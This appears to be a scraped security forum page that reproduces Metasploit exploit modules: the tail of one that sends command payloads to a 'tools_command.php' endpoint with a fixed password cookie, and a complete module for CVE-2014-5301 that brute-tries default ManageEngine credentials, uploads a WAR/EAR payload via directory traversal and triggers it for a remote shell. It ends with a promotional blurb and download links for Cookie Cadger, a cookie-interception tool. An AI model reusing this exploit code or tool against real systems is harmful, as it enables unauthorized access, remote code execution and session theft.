normalize_uri('/', 'tools_command.php'), 'vars_post' => { 'cmb_header' => '', 'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}" }, 'method' => 'POST', 'cookie' => "p=#{Rex::Text.md5('super')}" }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ print_good("#{peer} - Command sent successfully") if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m print_status("#{peer} - Command output: #{$1}") end else fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed") end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def exploit_session begin send_request_cgi({ 'uri' => normalize_uri('/', 'tools_command.php'), 'vars_post' => { 'cmb_header' => '', 'txt_command' => "#{payload.encoded}" }, 'method' => 'POST', 'cookie' => "p=#{Rex::Text.md5('super')}" }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
  9. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ManageEngine Multiple Products Authenticated File Upload', 'Description' => %q{ This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk, AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts the upload does not handle correctly '../' sequences, which can be abused to write in the file system. Authentication is needed to exploit this vulnerability, but this module will attempt to login using the default credentials for the administrator and guest accounts. Alternatively you can provide a pre-authenticated cookie or a username / password combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer, SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been been tested successfully in Windows and Linux on several versions. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-5301'], ['OSVDB', '116733'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5'] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => false, # Privileged on Windows but not on Linux targets 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Automatic', { } ], [ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9', { 'attachment_path' => '/workorder/Attachment.jsp' } ], [ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1', { 'attachment_path' => '/common/FileAttachment.jsp' } ], [ 'IT360 v8-v10.4', { 'attachment_path' => '/common/FileAttachment.jsp' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 15 2014')) register_options( [ Opt::RPORT(8080), OptString.new('JSESSIONID', [false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']), OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']), OptString.new('USERNAME', [true, 'The username to login as', 'guest']), OptString.new('PASSWORD', [true, 'Password for the specified username', 'guest']), OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to']) ], self.class) end def get_version res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) # Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360) version = [ 9999, 9999, 0, 'sd' ] if res && res.code == 200 if res.body.to_s =~ /ManageEngine ServiceDesk/ if res.body.to_s =~ / \| ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ output = $1 version = [output[0].to_i, output[2].to_i, '0', 'sd'] end if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/ # newer builds version[2] = $1.to_i elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # older builds version[2] = $1.to_i end elsif res.body.to_s =~ /ManageEngine AssetExplorer/ if res.body.to_s =~ /ManageEngine AssetExplorer ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ || res.body.to_s =~ /<div class="login-versioninfo">version ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/ output = $1 version = [output[0].to_i, output[2].to_i, 0, 'ae'] end if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/ version[2] = $1.to_i end elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/ # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version version[3] = 'sc' if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # ... but get the build number if we can find it version[2] = $1.to_i end elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/ # IT360 newer versions version[3] = 'it' end elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/ # IT360 older versions, not a very good detection string but there is no alternative? version[3] = 'it' end version end def check version = get_version # TODO: put fixed version on the two ifs below once (if...) products are fixed # sd was fixed on build 9031 # ae and sc still not fixed if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') || (version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') || (version[3] == 'sc' && version[2] < 99999) return Exploit::CheckCode::Appears end if (version[2] > 9030 && version[3] == 'sd') || (version[2] > 99999 && version[3] == 'ae') || (version[2] > 99999 && version[3] == 'sc') return Exploit::CheckCode::Safe else # An IT360 check always lands here, there is no way to get the version easily return Exploit::CheckCode::Unknown end end def authenticate_it360(port, path, username, password) if datastore['DOMAIN_NAME'] == nil vars_post = { 'LOGIN_ID' => username, 'PASSWORD' => password, 'isADEnabled' => 'false' } else vars_post = { 'LOGIN_ID' => username, 'PASSWORD' => password, 'isADEnabled' => 'true', 'domainName' => datastore['DOMAIN_NAME'] } end res = send_request_cgi({ 'rport' => port, 'method' => 'POST', 'uri' => normalize_uri(path), 'vars_get' => { 'service' => 'ServiceDesk', 'furl' => '/', 'timestamp' => Time.now.to_i }, 'vars_post' => vars_post }) if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed" return res.get_cookies else return nil end end def get_it360_cookie_name res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("/") }) cookie = res.get_cookies if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/ return $1 else return nil end end def login_it360 # Do we already have a valid cookie? If yes, just return that. if datastore['IAMAGENTTICKET'] cookie_name = get_it360_cookie_name cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';' return cookie end # get the correct path, host and port res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/') }) if res && res.redirect? uri = [ res.redirection.port, res.redirection.path ] else return nil end cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) if cookie != nil return cookie elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil # we've tried with the default guest password, now let's try with the default admin password cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator') if cookie != nil return cookie else # Try one more time with the default admin login for some versions cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin') if cookie != nil return cookie end end end nil end # # Authenticate and validate our session cookie. We need to submit credentials to # j_security_check and then follow the redirect to HomePage.do to create a valid # authenticated session. # def authenticate(cookie, username, password) res = send_request_cgi!({ 'method' => 'POST', 'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')), 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => cookie, 'vars_post' => { 'j_username' => username, 'j_password' => password, 'logonDomainName' => datastore['DOMAIN_NAME'] } }) if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/)) # sd and ae respond with 302 while sc responds with a 200 return true else return false end end def login # Do we already have a valid cookie? If yes, just return that. if datastore['JSESSIONID'] != nil cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';' return cookie end # First we get a valid JSESSIONID to pass to authenticate() res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/') }) if res && res.code == 200 cookie = res.get_cookies authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD']) if authenticated return cookie elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil # we've tried with the default guest password, now let's try with the default admin password authenticated = authenticate(cookie, 'administrator', 'administrator') if authenticated return cookie else # Try one more time with the default admin login for some versions authenticated = authenticate(cookie, 'admin', 'admin') if authenticated return cookie end end end end nil end def send_multipart_request(cookie, payload_name, payload_str) if payload_name =~ /\.ear/ upload_path = '../../server/default/deploy' else upload_path = rand_text_alpha(4+rand(4)) end post_data = Rex::MIME::Message.new if @my_target == targets[1] # old style post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"") post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"") post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"") post_data.add_part('', nil, nil, "form-data; name=\"vec\"") post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"") post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"") post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"") post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"") else post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"") post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"") post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"") end data = post_data.to_s res = send_request_cgi({ 'uri' => normalize_uri(@my_target['attachment_path']), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => cookie }) return res end def pick_target return target if target.name != 'Automatic' version = get_version if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') || (version[0] == 4 && version[3] == 'ae') || (version[3] == 'sc') # These are all "old style" versions (sc is always old style) return targets[1] elsif version[3] == 'it' return targets[3] else return targets[2] end end def exploit if check == Exploit::CheckCode::Safe fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable") end print_status("#{peer} - Selecting target...") @my_target = pick_target print_status("#{peer} - Selected target #{@my_target.name}") if @my_target == targets[3] cookie = login_it360 else cookie = login end if cookie.nil? fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate") end # First we generate the WAR with the payload... war_app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => war_app_base }) # ... and then we create an EAR file that will contain it. ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4)) app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" app_xml << '<application>' app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>" app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>" app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>" # Zipping with CM_STORE to avoid errors while decompressing the zip # in the Java vulnerable application ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) ear_file.add_file(war_app_base + '.war', war_payload.to_s) ear_file.add_file('META-INF/application.xml', app_xml) ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear' if @my_target != targets[3] # Linux doesn't like it when we traverse non existing directories, # so let's create them by sending some random data before the EAR. # (IT360 does not have a Linux version so we skip the bogus file for it) print_status("#{peer} - Uploading bogus file...") res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4))) if res && res.code != 200 fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed") end end # Now send the actual payload print_status("#{peer} - Uploading EAR file...") res = send_multipart_request(cookie, ear_file_name, ear_file.pack) if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful") else fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed") end 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end Source : ManageEngine Multiple Products Authenticated File Upload ? Packet Storm
  10. LINK DOWNLOAD What is Cookie Cadger? Cookie Cadger helps identify information leakage from applications that utilize insecure HTTP GET requests. Web providers have started stepping up to the plate since Firesheep was released in 2010. Today, most major websites can provide SSL/TLS during all transactions, preventing cookie data from leaking over wired Ethernet or insecure Wi-Fi. But the fact remains that Firesheep was more of a toy than a tool. Cookie Cadger is the first open-source pen-testing tool ever made for intercepting and replaying specific insecure HTTP GET requests into a browser. Cookie Cadger is a graphical utility which harnesses the power of the Wireshark suite and Java to provide a fully cross-platform, entirely open-source utility which can monitor wired Ethernet, insecure Wi-Fi, or load a packet capture file for offline analysis LINK DOWNLOAD
×
×
  • Create New...